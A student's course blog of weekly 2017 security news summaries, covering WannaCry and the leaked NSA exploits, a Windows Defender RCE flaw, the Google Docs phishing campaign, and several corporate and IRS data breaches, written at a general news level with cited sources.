Almost Done!

I would like to say this is my last time every submitting an assignment, but that would be a lie. I still have 10 weeks or two more classes until I will be done and have graduated with my master’s degree. I can say the last ten classes have been challenging and they have helped me to be a rounded cybersecurity professional. This class has been the most challenging out of all the ones I have taken. I wish this class would have been in class and not online, but I guess that option was not available. Seems like a lot of students are taking online classes, so they don’t have to drive to class.

When Coach says to take this course last, he is absolutely correct. I only have two electives left and all the core classes completed before I took this one. I can see why the other classes are needed because without those skills, this class would be near impossible. The other classes help a student build on the Harry and Mae’s case study and this class is the finish of the case study. Current trends helps a student understand threat modeling and how a cybersecurity employee can find threats in an organization.

Since this is a master’s class there is no guidance on how to do the assignments. This is to replicate what it would be like in an actual job. Your manager will ask for a report of vulnerabilities and ask you to send it to the executives for a meeting they will be having. To be honest I have had this happen to me several times and I was not always prepared for it. This class has taught me what executives are looking for in a powerpoint presentation and a report, so I’m a bit more prepared in my job.

The most difficult part of the course was understanding and identify threats with the Microsoft STRIDE model. I had last used this in the risk class over a year ago, so I had to go back and brush up. The good thing is there are plenty of articles out on the internet explaining Microsoft STRIDE and what it does. After spending several hours researching and understanding STRIDE it made the class much easier. Once that core concept is understood the next challenge is writing reports for the executives. When writing reports for the executive there is a style a person needs to follow and it can be hard to do that. When a person is use to writing technical reports then switches to writing executives reports it is a struggle. It took a lot for me to go back and re read my reports and correct wording that was technical and not executive wording.

I would have liked to spend more time reviewing other students work. The reason for this is I like to see how other people handled the assignment and the format of the assignment. I also liked reading and making corrections because it gave more eyes than just the professors. I got great feedback from my classmates on items that I needed to change or add. This feedback allowed me to modify my assignments and make the changes for my later assignments.

Overall this class has been a great experience in understanding threat modeling. Threat modeling is a skill every cybersecurity person should have because without it a person would be chasing their tail. Since threat modeling is a skill, a person needs to keep up that skill with practice. I hope I’m able to keep practicing threat modeling after the class and I also have a good book to keep as a reference. Thanks again Coach see you in the next class White Collar Crime.

Massive Cyber Attack

Introduction

            The blog for week 10 will be dedicated to the massive cyber attack affecting over 150 countries. On May 12, 2017, a massive cyber attack was started because of a leaked NSA exploit. A hacking group called the Shadow Brokers broke into the NSA and stole a trove of exploits. With these exploits, a ransomware called WannaCrypt used two exploits called ETERNALBLUE and DOUBLEPULSAR. Below are more details on how the history of how this massive cyber attack started.

Shadow Brokers

            Who are the Shadow Brokers? The Shadow Brokers are a hacking group that are famous for stealing NSA hacking tools. The Shadow Brokers released a few of the NSA Hacking tools in August of 2016 after they failed to auction off the tools (Gibbs,2017). The Shadow Brokers voted for Donald Trump and were not happy with his policies and actions after he became president (Ghosh,2017). They released the second group of NSA hacking tools in April 2017. The Shadow Brokers have more hacking tools to release and Edward Snowden says the NSA has more hacking tools in their arsenal. The Shadow Brokers have yet to be identified and remain wanted for breaking into the NSA and stealing their tools.  

ETERNALBLUE

            ETERNALBLUE is the name of the exploit stolen from the NSA. ETNERNALBLUE abuses the Server Message Block (SMB), a network file sharing protocol (Fox-Brewster, 2017). SMB v1 is old, dating back to Windows 95 and it is enabled by default on Windows XP, Vista, 7, 8 and on some version of 10. An attacker must use a specially crafted packet that exploits a vulnerability in SMB v1. Once the specially crafted packet has been sent, the attacker can now run code on the victim’s computer.  The code the attacker can run could be ransomware, a Trojan, or any other program the attacker wants to run.

DOUBLEPULSAR

            DOUBLEPULSAR is another exploit that was stolen from the NSA. DOUBLEPULSAR is a remote access Trojan or RAT, which allows attackers to have remote control of the victim’s computer. DOUBLEPULSAR also acts as a malware downloader to install other types of malware such as bots. DOUBLEPULSAR exploits SMB v1 and can hide on a computer system avoiding detection systems (Arghire, 2017).

WannaCrypt

            WannaCrypt is a piece of malware that is part of the ransomware family. Ransomware is a piece of malware that encrypts a person’s files and demands money to decrypt the files. WannaCrypt raises the payment after a set amount of time and it will also delete the files if no payment is received. WannaCrypt uses the ETERNALBLUE exploit to run itself on the victim’s machine. WannaCrypt is a computer worm that uses the ETERNALBLUE exploit to also spread itself across a network in a matter of seconds. Once the victim’s computer is infected with WannaCrypt it will scan random hosts on the internet to try and spread itself further (Kumar, 2017).

http://d3i6fh83elv35t.cloudfront.net/newshour/wp-content/uploads/2017/05/RTX35YNS-1024x765.jpg 

Conclusion

            Microsoft in their new version of Windows needs to stop backwards capability. As seen by ETERNALBLUE, an exploit was found in a 20 plus year old service. If Windows stops backwards capability this massive attack could have been mitigated. People were surprised by the leak of the NSA hacking tools, but how hard was it to find a flaw in a 20-year-old software. WannaCrypt hit systems that were not patched by MS17-010. Legacy systems may still use SMB v1, but old protocols should not be enabled on new operating systems by default. Microsoft has released a patch to fix the SMB v1 exploits, which includes a patch for Windows XP, Vista, 8, Server 2002, and Server 2008. Installing the patch is not a guarantee there is not another backdoor. It is advised to disable old protocols if they are not being used especially since the Shadow Brokers can release more NSA exploits.

References

Gibbs, S. (2017, May 18). Shadow Brokers Threaten To Unleash More Hacking Tools. Retrieved May 21, 2017, from http://www.cio-today.com/article/index.php?story_id=103003JXPSMS

Ghosh, A. (2017, April 09). 'President Trump what the f**k are you doing' say Shadow Brokers and dump more NSA hacking tools. Retrieved May 21, 2017, from http://www.ibtimes.co.uk/president-trump-what-fk-are-you-doing-say-shadow-brokers-dump-more-nsa-hacking-tools-1616141

Fox-Brewster, T. (2017, May 15). An NSA Cyber Weapon Might Be Behind A Massive Global Ransomware Outbreak. Retrieved May 21, 2017, from https://www.forbes.com/sites/thomasbrewster/2017/05/12/nsa-exploit-used-by-wannacry-ransomware-in-global-explosion/#3dcc7128e599

Arghire, I. (2017, April 24). Hackers Are Using NSA's DoublePulsar Backdoor in Attacks. Retrieved May 21, 2017, from http://www.securityweek.com/hackers-are-using-nsas-doublepulsar-backdoor-attacks

Kumar, M. (2017, May 15). WannaCry Ransomware: Everything You Need To Know Immediately. Retrieved May 21, 2017, from http://thehackernews.com/2017/05/how-to-wannacry-ransomware.html

Microsoft Anti-virus and Healthcare Vulnerability

Introduction

In Week 9 there has not been a shortage of security news. A healthcare organization had a vulnerability that allowed people to look at different patient records, which is quite serious. Microsoft had a remote code execution vulnerability that would allow an attacker to remotely control a machine. There were several other stories, but these were the two I chose to write on.

True Health Vulnerability

True Health Diagnostics located here https://truehealthdiag.com/ had a major vulnerability discovered by a patient. The vulnerability was found on their patient portal, which is located at the following link https://my.truehealthdiag.com/customlogin.htm. The patient was Troy Mursch who is an IT consultant that lives in Las Vegas (Krebs, 2107). Mursch found the vulnerability when he was looking at a PDF of this blood test and saw the link True Health Diagnostics created could be edited. Mursch edited the link to the PDF and was able to access other patient’s test and records. Once Mursch found the vulnerability he called and alerted True Health Diagnostics to the flaw. True Health Group shut down their website while they found and fixed the website.

https://my.truehealthdiag.com/customlogin.htm.

At this point, there is no knowledge of how long the vulnerability has existed. This means patients or an attacker could have been stealing data for several years. True Health Diagnostics needs to hire a forensic company to come in and do an investigation. This is the only way to know if there was unauthorized access to patient’s records. If they don’t hire a forensic investigator then I don’t think they are being ethical. I like the way True Health Diagnostics responded to the vulnerability by shutting off their site. This is the first time I have heard of this and it is truly a bold and interesting move. Most companies would say they will investigate an issue and either fix or not fix it while keeping their website up.

Microsoft Remote Code Execution

It has been discovered that Microsoft has a vulnerability in their malware scanner. Google Project Zero found the remote code execution in Windows anti-malware software. Per thehackernews article the following is the affected software Windows Defender, Windows Intune Endpoint Protection, Microsoft Security Essentials, Microsoft System Center Endpoint Protection, Microsoft Forefront Security for SharePoint, Microsoft Endpoint Protection and Microsoft Forefront Endpoint Protection (Kumar, 2017). Google’s Project Zero found that if any of the Microsoft anti-virus programs above scanned a specially crafted file, a hacker could have full control of the computer. The file can get to the computer via an email phishing attack or by downloading the malicious file. One of the important details is that the attack can happen over email without reading or even opening the full email (Mix, 2017). Since Microsoft’s anti-virus programs have real time scanning once the file is created, opened, downloaded or moved it will trigger the exploit (Kumar, 2107). Microsoft has released a patch for Windows 7, 8, 10 and RT in only 3 days!

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBCzqnnLyAg6_SjOQs2CZIvAQIWV0g-plxCJirtP0cv36sqXxAqjyI6q4-RhXURj_Dq52nI5vW5xuIaE6EQnCl5rfsiyI_x9I-0l6UdtuXL7TAt1bdmEKTZyFnjVs7AzwkaEDscxoJJpd7/s1600/windows-defender-remote-code-executiont.png

The remote code execution in this instance needs a special file for the exploit to work, but hackers can get their hands on this file and use it to spread malware. This “loophole” can allow a hacker to install new programs such as a Trojan or change program permission because it basically gives them ROOT access. It was good to see Microsoft patch this vulnerability, so quickly because it usually takes longer than 3 days. The scary part of this remote code execution exploit is the file doesn’t even need to run to infect the computer, only the Microsoft anti-virus program has to scan it. These types of exploits make a hacker’s job easy because it doesn’t really require them to trick a user into installing a file.

References

Krebs, Brian. "Krebs on Security." Brian Krebs. May 8, 2017. Accessed May 14, 2017. https://krebsonsecurity.com/2017/05/website-flaw-let-true-health-diagnostics-users-view-all-medical-records/.

Kumar, Mohit. "Microsoft Issues Emergency Patch For Critical RCE in Windows Malware Scanner." The Hacker News. May 09, 2017. Accessed May 14, 2017. http://thehackernews.com/2017/05/windows-defender-rce-flaw.html.

Mix. "Microsoft issues fix for critical exploit in Windows Defender found by Google." The Next Web. Accessed May 14, 2017. https://thenextweb.com/microsoft/2017/05/09/microsoft-google-windows-vulnerability/?amp=1. 

Google Phishing Attack Plus Data Beach

Introduction

For Week 8 there has been no shortage of news articles to pick from. I will be covering another data breach from a large company and a large phishing attempt. Companies seem to be giving less and less details about data breaches, so I have found I need to write about other topics.

Google Phishing Attack

With all the news about the “Great Google Phishing Email” I figured I would talk about it in my blog. It is a simple phishing attempt that many people fell for even security professionals. The phishing email was simple it said “(Person’s name) has invited you to view the following document” and a button to open the link into Google Docs.  Below is a screenshot of the phishing message.

https://static01.nyt.com/images/2017/05/04/business/04spam1/04spam1-master768.png

If a user clicks on the link “Open in Docs” it opens a screen that says a person must allow access to Google Docs for the purpose of reading, sending, deleting and managing a person’s email along with managing a person’s contacts (Khandelwal, 2017).

http://thehackernews.com/2017/05/google-docs-phishing-email.html

If a user clicks allow, the attackers have full control over the user's email. Once full control is gain over the user’s mailbox the attackers use it to spread the phishing email.  If the user has two-factor authentication enabled, it will not stop the attackers from taking over the user’s email account. Per Google, only 1 percent of Gmail users were affected by this phishing attempt, which is about 1 million people (Khandelwal, 2017). Google has since blocked the fake application and phishing email.

Even Google can be a victim of a phishing attack, so it is best to be on alert when opening documents sent by contacts. With security professionals fooled by this phishing attack, it shows that these types of attacks can be complexed. Phishing attacks are thought to be easily spotted, but that is not always the case. Even simple attacks are missed because people don’t always read the entire email, which can lead to trouble. Google already does an excellent job of blocking most phishing emails, but if you use other email clients be aware and always read the email entirely. Another good tip is to look at the sender’s email address and if it is not recognizable don’t click on any links.

SynXis Data Breach

Sabre Corp has had a breach from their software as a service application called SynXis. The application comes from Sabre’s hospitality company called “Sabre Hospitality”. The SynXis system is a reservation software that hotels used to keep track of inventory and rate information. Per saberhospitality.com over 120 property management. 2 revenue management and 7 CRM organizations use the software (http://www.sabrehospitality.com/solutions/hotel-central-reservation-systems).  The hackers gain access to the SynXis application, but there is no information on what information they got ahold of or how they gained access to the system.  Sabre has said the unauthorized access to the system has been terminated and security firm Mandiant is investigating the breach after notifying law enforcement (Krebs, 2017). This breach is thought to be linked to the recent hotel breaches over the last several months. On Sabre’s SynXis system login only a username and password are required and the breach maybe a result of a credential stuffing attack from recent stolen username and passwords.

http://ef67fc04ce9b132c2b32-8aedd782b7d22cfe0d1146da69a52436.r14.cf1.rackcdn.com/sabre-warns-hotels-card-data-potentially-compromised-showcase_image-1-a-9884.jpg

Sabre is a large organization with an annual revenue of over 3 billion dollars and it seems they have not invested in security. The SynXis system does not have two-factor authentication, which could have prevented the hackers from logging onto the system. Sabre paid for cyber security insurance, but without knowing more details it’s hard to say if the insurance will cover the breach. Cyber security insurance is new, but it is like covering a person’s house or car. For some companies, it may be cheaper to buy cyber security insurance then hire a whole security team. Without more information about how the breach occurred, it is hard to say what could have been done to prevent it. Hotel companies seem to have lax security practices, which seems why hackers target them for credit and debit card information. When more information surfaces about the breach I will write a follow-up entry.

References

Khandelwal, Swati. "Warning! Don't Click that Google Docs Link You Just Received in Your Email." The Hacker News. N.p., 03 May 2017. Web. 06 May 2017. <http://thehackernews.com/2017/05/google-docs-phishing-email.html>.

Krebs, Brian. "Krebs on Security." Brian Krebs. N.p., 2 May 2017. Web. 06 May 2017. <https://krebsonsecurity.com/2017/05/breach-at-sabre-corp-s-hospitality-unit/>. 

Bug Bounty plus UK Data Breach

Introduction

For Week 7 there has been interesting news articles. Of course there is another data breach, but this one happened outside of the United States. The Unites States Air Force has been following the other branches of the military and will start their own bug bounty program. 

Bug Bounty

The United States Air Force has started a bug bounty program. The bug bounty program is designed to pay hackers or security researchers to find vulnerabilities on their systems. The pay is based on the vulnerabilities found and how critical they are. Hackers and security researchers are invited from the United States and five other countries. The countries are the United Kingdom, Canada, Australia, and New Zealand (Kumar, 2017). For the “Hack the Air Force” program people must go through a background check and not have a criminal record. The reason for the background check and no criminal record is because people could access top secret materials and exfiltrate data. This will be one of the largest bug bounty programs put on by the United States military.

Allowing hackers inside the military network is a great idea! The best part is that if the hackers don’t find anything the military doesn’t need to pay them. The last event per the article had over 14,000 hackers and they found 138 vulnerabilities, plus 75,000 dollars was paid out in reward money (Kumar, 2017). Giving hackers a chance to use their skills to get paid is awesome! Hackers usually break into systems or steal information because they are bored or they want to make more money. Problems with this are vulnerabilities can be leaked out or information taken if a person is not ethical. In the end, paying individuals instead of a company can result in more vulnerabilities being found depending on the skill of the person.

https://www.hackerone.com/sites/default/files/inline-images/hack-the-air-force.png

Payday Loan Breach

A payday loan provider called Wonga has had its customer’s data stolen. Around 245,000 Wonga customers in the United Kingdom and 25,000 Wonga customers in Poland have been affected by the breach (Lomas, 2017). There is no information about how Wonga was broken into, but there will be more information in the following weeks. Wonga’s site has information about the data breach located at https://www.wonga.com/help/incident-faq. The hackers may have gotten access to people’s names, email addresses, home addresses, phone numbers, the last four numbers of their credit / debit card and or bank account numbers, plus the sort codes (Lomas, 2017). Wonga believes that passwords weren’t taken during the incident, but as a safety precaution, they want everyone to change their passwords.

The data breach happened on April 7, 2017, but there has been no update as to how the hackers got in. They will not release the information because it could be damaging to the company. An educated guess would be Wonga left a security hole in an external facing site. United Kingdom businesses in 2018 are going to want to better protect their customer’s data because of an upcoming law. The new EU law will require companies notify the data protection authorities with 3 days or face a fine up to 10 million euros (Lomas, 2017). Some people have even said that the hackers won’t get much from the company’s customers because they don’t have much money.  Without knowing how the breach occurred it is hard to say if the issue can be fixed.

Summary

If a company can’t hire their own internal security engineers, they need to pay companies to look at their security. The internet is not going away and with customers wanting more convenience, cyber security will only get more important. With the United Kingdom implementing new laws that companies must report data breaches is a new concept. The United States does not have laws like the United Kingdom, but they are coming. Soon there will be a branch of the FBI that will investigate data breaches and fines if people’s personal information is not kept “up to code”.  The other problem is every company wants all types of information and most of it is not stored correctly. The way the information is stored in some industries is not regulated at the current moment in the United States.

References

Lomas, N. (2017, April 10). Payday loan firm Wonga suffers data breach affecting up to 270,000. Retrieved April 29, 2017, from https://techcrunch.com/2017/04/10/pay-day-loan-firm-wonga-suffers-data-breach-affecting-up-to-270000/

Kumar, M. (2017, April 27). Hack'em If You Can - U.S. Air Force launches Bug Bounty Program. Retrieved April 29, 2017, from http://thehackernews.com/2017/04/hack-the-air-force.html

IHG Data Breach and NSA Hacking Tools Week 6

For week 6 I have two items to discuss. The first is the IHG or InterContinental Hotel Group data breach and the second is how the leaked NSA tools are being used to attack Windows PC’s.  IHG had a breach back in December of 2016 and IHG said the data breach only affect a few of its properties. Now in April 2017, IHG has released data showing that more than 1,000 IHG properties were affected by the data breach. IHG properties computer systems were compromised with malicious software designed to siphon customer debit and credit card data just let Target and Home Depot (Krebs, 2017). IHG has been in the process of implementing a secure payment solution that will encrypt customer's data end to end.  Unfortunately, IHG only had a few sites done at the time on the data breach and they were not affected. PCI has a requirement for point-to-point encryption, so it seems IHG is behind on their PCI requirements. At the following site, a person can look up what IHG properties were affected by the data breach and the dates https://www.ihg.com/content/us/en/customer-care/protecting-our-guests/property-listing. The site can be used by a person to see if their credit or debit card was affected and if they need to be on the lookout for fraudulent charges. Below is a screenshot of an email sent to franchise hotel’s offering a forensic investigation to be paid by IHG (Krebs, 2017).

https://krebsonsecurity.com/2017/04/intercontinental-hotel-chain-breach-expands/

The leaked NSA hacking tools are being used in the wild. A hacker group called Shadow Brokers has leaked hacking tools that supposedly belonged to the NSA’s Equation Group (Khandelwal, 2017).  A piece of malware designed by the NSA called DoublePulsar was one of the tools released by Shadow Brokers. DoublePulsar is being used as a spying tool and it is installed because of vulnerable SMB and RDP versions. DoublePulsar does not write any files to the computer to remain stealthy and DoublePulsar acts a remote access Trojan. A person has released a python script to test IP addresses to see if they have the DoublePulsar infection.  The python script is located at https://github.com/countercept/doublepulsar-detection-script. Below is a screenshot of someone who ran the python script and found computer infected with DoublePulsar. 

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimJXQ4EXZB3KXGEmzjWCJiAzRrz_u9oyTL7Hyq2KdtJQDgXUMPs_5TaMxTacklYnjOwed41c9vU82CkPVHNbZnDijjoCtR_7AiYxn36X6W247IXXIq4aCxrvoOf9y_rILKljkLlFlCOzfD/s1600/windows-hacking-tools.png

The numbers of how many machines are affected have been varying, but it seems to be at least 30,000 machines are infected. Microsoft has released patches to fix SMB and RDP vulnerabilities. If people are still using an end of life software such as Windows XP and Windows Server 2003 they are vulnerable and will remain vulnerable because they will not receive security patches (Khandelwal, 2017). Script kiddies and other hackers will be able to freely use DoublePulsar to infect machines and make them zombies until the patch from Microsoft has been applied.

With hotels and businesses not encrypting credit card data end to end data breaches will continue to happen. One item that will not show up in the news articles is how the malware got install on the machines. Some organizations do not have a good security and I know for a fact at one hotel computers are not locked down at all. It seems organizations would rather have a data breach then pay for security because it is cheaper. People have the stigma that if a company has a data breach it is bad, but because, so many are happening it is just another day. Look at Target and Home Depot; people still shop there after they have had a massive data breach. People will continue to stay at IHG properties and if they have stock there may be a blip in it, but it will come back. At the end of the day, security needs to be a priority for businesses that store or transport customers data.

References

Krebs, B. (2017, April 18). Krebs on Security. Retrieved April 23, 2017, from https://krebsonsecurity.com/2017/04/intercontinental-hotel-chain-breach-expands/

Khandelwal, S. (2017, April 22). Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs. Retrieved April 23, 2017, from http://thehackernews.com/2017/04/windows-hacking-tools.html

IRS Data Breach + Zero Day Week 5

During week 5 of CYBR 650 there has been plenty of security news. The blog this week will touch on a Microsoft zero day vulnerability and a data breach that happened at the IRS.  This Microsoft zero day vulnerability is in Microsoft Office and allows remote code execution to take place. This vulnerability affects all current versions of Microsoft Office, which includes Office 2016. The vulnerability was first found by Ryan Hanson in July of 2016. McAfee reported the zero day on Friday, but said Microsoft has known about it since January (Goodin, 2017). Hackers are now using this vulnerability to spread banking malware called Dridex. A word document that has been specially crafted can be executed on a computer, which allows an attacker to run code. The word document containing a malicious OLE2link object is how the attack starts. This specific attack runs the exploit code then makes a connection out to a remote server, where a malicious HTML application file or HTA gets downloaded (Khandelwal, 2017). Once the HTA file gets downloaded it runs and downloads different pieces of malware designed to gain control of the computer or steal credentials.  Below is a screenshot of a phishing email that contains a malicious word document.

https://arstechnica.com/security/2017/04/microsoft-word-0day-used-to-push-dangerous-dridex-malware-on-millions/

            Microsoft has released a patch yesterday to fix the vulnerability. This will stop the code from running if an email of the word document gets through the security controls. The worst part about this zero day is Microsoft has known about this and did not fix it. The fix only came out after hackers were using it to spread malware via emailing a word document. ProofPoint saw the new malware campaign and was able to block the malicious word document.

            The Internal Revenue Service or IRS has had a data breach that may affect up to 100,000 people. The IRS has a tool for FAFSA or Free Application Federal Student Aid that hackers have exploited. The tool for FAFSA helped family and students complete the form because it is lengthy. Since I’m I have gotten my associates, bachelors and currently getting my masters I have had to fill out the FASFA forums. The FASFA forums are long and are a pain to fill out.  According to Krebs on Security fraudsters may have been using the tool to get AGI or adjusted gross income (Krebs, 2017). The IRS has disabled the tool because people were starting to use it for fraud. The tool is called the IRS Data Retrieval Tool or DRT. John Koshinen went before the Senate Finance Committee to testify that less than 8,000 fraudulent returns were processed by the IRS (Cohn, 2017).

            The good thing is the tool is expected to be back online, but not till October. Does the IRS run any penetration tests or security testing? It seems like their tools are put into production without any testing and it is causing people to lose their personal information. The IRS needs to provide protection to the users that were affected from the breach. Companies that have had a data breach have provided identity theft protection, but the government does not provide these protections.

References

Goodin, D (2017, April 11). Microsoft Word 0-day used to push dangerous Dridex malware on millions. Retrieved April 13, 2017, from https://arstechnica.com/security/2017/04/microsoft-word-0day-used-to-push-dangerous-dridex-malware-on-millions/

Cohn, M. (2017, April 10). Data breach of IRS student financial aid tool may have affected 100,000 taxpayers. Retrieved April 13, 2017, from https://www.accountingtoday.com/news/data-breach-of-irs-student-financial-aid-tool-could-have-affected-100-000-taxpayers

Krebs, B. (2017, March 21). Krebs on Security. Retrieved April 13, 2017, from https://krebsonsecurity.com/2017/03/student-aid-tool-held-key-for-tax-fraudsters/

Khandelwal, S. (2017, April 11). Unpatched Microsoft Word Flaw is Being Used to Spread Dridex Banking Trojan. Retrieved April 13, 2017, from http://thehackernews.com/2017/04/microsoft-word-dridex-trojan.html